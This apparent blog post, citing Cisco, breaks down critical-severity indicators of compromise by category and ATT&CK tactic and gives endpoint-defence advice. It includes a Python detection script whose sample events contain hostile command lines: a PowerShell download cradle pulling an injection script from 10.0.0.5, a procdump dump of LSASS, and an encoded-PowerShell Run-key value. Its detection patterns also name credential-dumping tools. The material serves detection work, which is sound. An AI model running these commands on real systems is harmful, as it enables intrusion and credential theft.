As a cybersecurity professional, you need to know that in routine operations you would encounter
not more than 3-5% Critical Indicators of Compromise (IoCs),
around 10% of High Severity,
and the remaining 50% of Medium Severity and 35% of Low Severity!
As you might expect, the vast majority of alerts fall into the low and medium categories. There is a wide variety of IoCs within these severities, and how serious a threat the activity behind one of these alerts poses depends on a number of factors.
Let us focus on the critical severity IoCs.
While these make up a small portion of the overall IoC alerts, they are arguably the most destructive and require immediate attention when seen.
The most common threat category seen among these was FILELESS malware. These IoCs indicate the presence of fileless threats: malicious code that runs in memory after the initial infection rather than from files stored on disk, typically persisting only through the registry. A good Endpoint Security solution should detect the activities that betray them, e.g., suspicious process injection and registry activity. Threats often seen here include Kovter, Poweliks, Divergent, and LemonDuck.
Next are DUAL-USE tools, which can be leveraged for both exploitation and post-exploitation tasks. PowerShell Empire, Cobalt Strike, PowerSploit, and Metasploit are four such tools currently seen here. While these tools can very well be used for non-malicious activity, such as authorized penetration testing, bad actors frequently utilize them too. If you receive such an alert and do not have an authorized exercise (penetration test or red team engagement) in play, an immediate investigation is a must.
The third most frequently seen IoC group is another category of DUAL-USE tools: credential dumpers. Credential dumping is the process malicious actors use to scrape login credentials from a compromised computer. The most commonly seen of these tools is Mimikatz, which your Endpoint Security solution should catch when credentials are being dumped from memory (on Windows, typically from the LSASS process).
These first three categories comprise 75 percent of the critical severity IoCs seen. The remaining 25 percent contains a mix of behaviors known to be carried out by well-known threat types:
• Ransomware threats like Ryuk, Maze, BitPaymer, and others
• Worms such as Ramnit and Qakbot
• Remote access trojans like Corebot and Glupteba
• Banking trojans like Cridex, Dyre, Astaroth, and Azorult
• …and finally, a mix of downloaders, wipers, and rootkits
Critical Tactics
While this paints an interesting picture of the threat landscape, things become even more interesting when MITRE ATT&CK tactics are combined with critical severity IoCs.
• Execution is more common among critical severity IoCs than Defense Evasion.
• Persistence appears in 38 percent of critical IoCs, as opposed to 12 percent of IoCs overall.
• Lateral Movement jumps from 4 percent of IoCs seen to 22 percent.
• Credential Access moves up three spots, increasing from 4 percent to 21 percent.
What can you do to defend your endpoints?
Here are a few suggestions about things to look at:
1. Limit execution of unknown files
If malicious files can't be executed, they can't carry out malicious activity. Use group policies and/or application allow lists (for example AppLocker or Windows Defender Application Control) to restrict which applications are permitted to run on endpoints in your environment. That is not to say that every available control should be leveraged to completely lock an endpoint down: limiting end-user permissions too severely creates entirely different usability problems. Keep in mind, too, that allow lists alone do not stop the fileless threats described above, because those run through signed script hosts such as PowerShell that are usually permitted; that is what the monitoring in point 3 is for.
2. Limit the use of dual-use tools
If your organization utilizes dual-use tools for activities like remote management, severely limit the number of accounts permitted to run them, granting only temporary access when the tools are actually needed.
3. Monitor processes and the registry
Registry modification and process injection are two primary techniques used by fileless malware to persist and hide its activity. Monitoring the registry for unusual changes (for instance new Run keys whose values launch script hosts or encoded PowerShell) and looking for anomalous process injection attempts will go a long way towards catching such threats before they gain a foothold.
4. Monitor connections between endpoints
Keep an eye on connections between endpoints, as well as connections to servers within the environment. Investigate if two machines that shouldn't be talking to each other are connecting, or if an endpoint is talking to a server in a way it doesn't normally. This could be a sign that bad actors are attempting to move laterally across the network.
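The fileless, dual-use and credential-dumping categories described earlier, together with points 3 and 4 of this list, all come down to rules over endpoint telemetry. The script below is an added example written for this post; it is not Cisco's detection logic and not the author's code. It runs one toy rule per category over a handful of constructed Sysmon-style event records (every hostname, user, path and the 10.0.0.5 address is invented) and tags each hit with the ATT&CK tactic it maps to, so the per-tactic and per-host counts it produces are the same view as the critical-tactic percentages quoted above.

```python
"""Added example for this post, not Cisco's detection logic or the author's code.
One toy rule per critical-severity IoC category, run over constructed Sysmon-style
records (EventID 1 = process create, 3 = network connection, 10 = process access,
13 = registry value set). Every name, path, user and address below is invented."""
import re
from collections import Counter

# Constructed asset inventory; a real rule would pull host roles from the CMDB.
ASSETS = {"WS-101": "workstation", "WS-102": "workstation", "WS-103": "workstation",
          "FS-01": "file-server", "DC-01": "domain-controller"}
ADMIN_PORTS = {135, 139, 445, 3389, 5985, 5986}   # RPC, SMB, RDP, WinRM
KNOWN_LSASS_READERS = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe"}
PROCESS_VM_READ = 0x0010                            # access right a memory dumper needs

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
FILELESS_LAUNCHER = re.compile(
    r"mshta|javascript:|vbscript:|regsvr32.*scrobj|wscript|cscript|"
    r"powershell.*\s-(e|ec|enc|encodedcommand)\b", re.I)
DUAL_USE = re.compile(
    r"Invoke-Shellcode|Invoke-ReflectivePEInjection|PowerSploit|Empire|"
    r"meterpreter|msfvenom|Cobalt\s*Strike|beacon\.dll", re.I)
CRED_DUMP = re.compile(
    r"sekurlsa::|lsadump::|mimikatz|procdump.*lsass|comsvcs\.dll.*MiniDump|lsass\.dmp", re.I)


def _hit(ev, rule, tactic, evidence):
    return {"host": ev["host"], "rule": rule, "tactic": tactic, "evidence": evidence}


def detect(events):
    """Return one finding per rule hit; a single event may trigger more than one rule."""
    findings = []
    for ev in events:
        if ev["id"] == 13 and RUN_KEY.search(ev["key"]) and FILELESS_LAUNCHER.search(ev["details"]):
            # A script-host launcher stored in a Run key: the Kovter/Poweliks shape.
            findings.append(_hit(ev, "fileless_persistence", "Persistence", ev["details"]))
        elif ev["id"] == 1:
            if DUAL_USE.search(ev["cmdline"]):
                findings.append(_hit(ev, "dual_use_tool", "Execution", ev["cmdline"]))
            if CRED_DUMP.search(ev["cmdline"]):
                findings.append(_hit(ev, "credential_dumping", "Credential Access", ev["cmdline"]))
        elif ev["id"] == 10:
            src = ev["source_image"].rsplit("\\", 1)[-1].lower()
            if (ev["target_image"].lower().endswith("\\lsass.exe")
                    and int(ev["granted"], 16) & PROCESS_VM_READ
                    and src not in KNOWN_LSASS_READERS):
                # Anything outside the allow-list reading LSASS memory is dumping credentials.
                findings.append(_hit(ev, "lsass_memory_read", "Credential Access",
                                     f"{src} granted {ev['granted']}"))
        elif ev["id"] == 3:
            if (ev["dst_port"] in ADMIN_PORTS and ASSETS.get(ev["src_host"]) == "workstation"
                    and ASSETS.get(ev["dst_host"]) == "workstation"):
                # Workstations do not normally administer each other over SMB/RDP/WinRM.
                findings.append(_hit(ev, "workstation_to_workstation_admin", "Lateral Movement",
                                     f"{ev['src_host']} -> {ev['dst_host']}:{ev['dst_port']}"))
    return findings


def tactic_breakdown(findings):
    """ATT&CK tactic -> number of critical findings, the view the post's statistics use."""
    return Counter(f["tactic"] for f in findings)


def rank_hosts(findings):
    """Hosts ordered by number of critical findings, most first: the triage order."""
    return Counter(f["host"] for f in findings).most_common()


# Constructed sample telemetry: five malicious events interleaved with four benign ones.
EVENTS = [
    {"id": 13, "host": "WS-101", "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\WinUpd",
     "details": 'mshta vbscript:CreateObject("Wscript.Shell").Run("powershell -w hidden -enc SQBFAFgA",0)'},
    {"id": 13, "host": "WS-103", "key": r"HKU\S-1-5-21-2\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"id": 1, "host": "WS-102", "user": r"CORP\jdoe", "cmdline": "powershell.exe -nop -w hidden -c IEX "
     "(New-Object Net.WebClient).DownloadString('http://10.0.0.5/Invoke-ReflectivePEInjection.ps1')"},
    {"id": 1, "host": "WS-102", "user": r"CORP\jdoe",
     "cmdline": r"cmd.exe /c procdump64.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp"},
    {"id": 1, "host": "WS-103", "user": "NT AUTHORITY\\SYSTEM", "cmdline": "svchost.exe -k netsvcs -p"},
    {"id": 10, "host": "WS-102", "source_image": r"C:\Users\Public\mk.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted": "0x1010"},
    {"id": 10, "host": "WS-103", "source_image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted": "0x1fffff"},
    {"id": 3, "host": "WS-102", "src_host": "WS-102", "dst_host": "WS-101", "dst_port": 445},
    {"id": 3, "host": "WS-101", "src_host": "WS-101", "dst_host": "FS-01", "dst_port": 445},
    {"id": 3, "host": "WS-102", "src_host": "WS-102", "dst_host": "WS-103", "dst_port": 5985},
]

if __name__ == "__main__":
    hits = detect(EVENTS)
    for h in hits:
        print(f"{h['host']:7} {h['tactic']:18} {h['rule']:34} {h['evidence'][:60]}")
    print(dict(tactic_breakdown(hits)), rank_hosts(hits))
```

On the constructed input, WS-102 collects five findings across Execution, Credential Access and Lateral Movement, which is exactly the profile the post says deserves immediate investigation, while the OneDrive Run key, the Defender engine reading LSASS and the workstation-to-file-server SMB session stay silent. The LSASS rule is the one worth copying: instead of matching on a tool name it checks the access mask Sysmon reports and allow-lists the few legitimate readers, so a renamed Mimikatz still trips it.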
(Source: Cisco)
--
Please let me know what you think about this in the comment section. You can also share it with others if the information here helps you in some manner.
If you are interested in reading more such posts on cybersecurity, you can always let me know by leaving a comment.
This article was written and published by Meena R, Senior Manager - IT, at Luminis Consulting Services Pvt. Ltd, India.
Over the past 16 years, Meena has built a following of IT professionals, particularly in Cybersecurity, Cisco Technologies, and Networking...
You can follow her on Facebook: Cybersecurity PRISM